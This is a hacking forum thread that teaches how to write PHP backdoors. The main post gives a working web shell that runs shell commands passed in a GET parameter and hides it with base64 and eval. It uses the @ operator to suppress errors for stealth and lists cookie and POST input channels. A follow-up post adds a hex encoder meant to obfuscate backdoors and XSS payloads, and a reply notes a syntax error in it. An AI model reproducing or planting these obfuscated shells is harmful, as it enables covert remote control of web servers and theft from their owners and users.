» Creating Backdoors in PHP

[MaXe]

Dear members and guests of InterN0T,


This is a small tutorial to how One could make backdoors in PHP.
The reason why a backdoor may be needed could be if your site
gets hacked but if there's no protection on the backdoor and if
a hacker finds that backdoor then your site may get hacked that
way too, so be careful with these examples.

First we need to know which functions we can use:
- System(); // Executes an external program.
- Exec(); // Executes an external program.
- Fopen(); // Opens a file on the system.
- Include(); // Includes a file to be executed.
- Eval(); // Executes PHP code.

With that in mind, we move over to how the backdoor can receive input:
- $_GET['var']; // Receives input like: file.php?var=command
- $_POST['var']; // Receives input via the POST-parameter. (LiveHTTPHeaders can be used).
- $_COOKIE['var']; // Receives input via browser-cookies.

Now we might want to encode the backdoor, a few ways are:
- Base64 encoding (base64_encode() is a builtin function).
- Encode it like shellcode: "\xDE\xAD\xBE\xEF";
- And possibly many more ways!

So lets say you want to create a backdoor which uses:
- system() + $_GET[] + base64_encode()

Before encoding anything we write the code that we want to be executed:

PHP Code:

<?php system($_GET['s3cr3t']); ?>

That's how simple it will look if it wasn't encoded.

In order to encode it we can either use an application or do it ourselves:
<?php
$var = "system(\$_GET['s3cr3t']);"; // $ needs to be escaped.
echo base64_encode($var);
?>

Which results in: c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7

In order to execute it we need the following PHP code:

PHP Code:

<?php
eval(base64_decode("c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7"));
?>

Which will work fine if we supply a GET-request to the file it is
included in all the time. Otherwise it will send an error to the site
because system() can't handle empty requests.

In order to bypass this issue we could use: error_reporting(0); in
our script. But that results in a lot more code! So why not use some-
thing easier such as @ before the command?

This should supress all warnings, from system() only of course.

Without encoding the backdoor the code would look like:

PHP Code:

<?php @system($_GET['server']); ?>

Pretty simple? I think so too and I'm glad that I haven't seen
that many problems with PHP backdoors yet since it would be
a pain to check anything you might want to use, for backdoors.

Our backdoor is at this stage very simple but also very small.

One of the first things to implement after using system() or exec()
would be sending the output to <pre></pre> tags so the output is
easy to read which is a good idea when using PHP backdoors.

The other commands we can use, fopen() and include() in short
may be used for LFI and perhaps RFI (depending on php.ini settings).

Eval() can be used to execute PHP code directly which would probably
be one of the most effective backdoors if the hacker, knows PHP of course!

That's basicly it of what you could or should know about PHP backdoors at the moment.

Update:
I've recently had some more cool ideas (which are hard to implement, yet more stealthy).
I will write about them as soon as I am done with my other projects (I have many at the
moment and there is a lot of testing with my new ideas).

Meanwhile I also created a better application in PHP for creating and encoding backdoors!

Application Link: HaXxd00r


Best regards,
MaXe

[Norph]

nice! :)
I've considered this before, but never really thought about base64 encoding it.
Thanks for sharing. I'll look forward to see more of this coming? ;)
+rep

[sud0xe]

I see a lot of php backdoors in nulled scripts and website templates. They mostly use base64 to encode thier scripts but i have seen commercial encoders being used which are a little more complicated to decode.

[MaXe]

Here's a Hex Encoder which should output the string as valid hex-
encoding to be used in f.ex. PHP backdoors, Cross Site Scripting etc.

Please keep in mind that I haven't tested it, I just wrote it in notepad at work.

Code:

<?php

/**
* Hex Encoder 1.0 made by MaXe - Founder of InterN0T.net
**/

$usr_input = isset($_GET['text']) ? $_GET['text'] : $_GET['text']="";


if($usr_input=="") {
echo '
<html>
<head>
<title>HeX Encoder</title>
</head>
<body>
<br />
<center>
<h3>Input a string to encode</h3><br />
<form action="?" method="GET">
<input type="text" name="text" value="" />
<input type="submit" value="Encode" />
</form>
</center>
</body>
</html>
';
} else {
echo '
<html>
<head>
<title>HeX Encoder</title>
</head>
<body>
<br />
<center>
<h3>Use the output below for your PHP backdoor:</h3><br />
HexEncode($usr_input);
<br /><br />
For example, this should work: <br />
eval("'. HexEncode($usr_input); .'");
</center>
</body
</html>
';
}

function HexEncode($String) {
for ($i = 0; $i < strlen($String); $i++)
    {
        $HexChar = bin2hex($String[$i]);
        echo "\\x" .$HexChar;
    }
}

?>

In short it will output the string like:

\xDE\xAD\xBE\xEF etc and also give an example of how
it can be used like: eval("\xDE\xAD\xBE\xEF");

I might make an encoder for PHP backdoors in the future, just for fun xD

[BuRner]

Nice script, just the ';' which must be deleted line 41 after the function call ;)

[Except1onX]

Nice app u made there MaXe. xD

[MaXe]

There's a new app out Except1onX

Link: HaXxd00r ;-D

[ne011]

Quote:

Originally Posted by MaXe

There's a new app out Except1onX

Link: HaXxd00r ;-D

that is cool Maxe

[jhbalaji]

Great! But how can we use this!
Can you explain!
thanks :)

[lostpassword]

Nice.
The only darkside of a backdoor in PHP is that we can't use it in free hosting services, which doesn't allow to use system(), exec() functions.
Anyway, it remains one of the best technique used in this world, so , good work ;)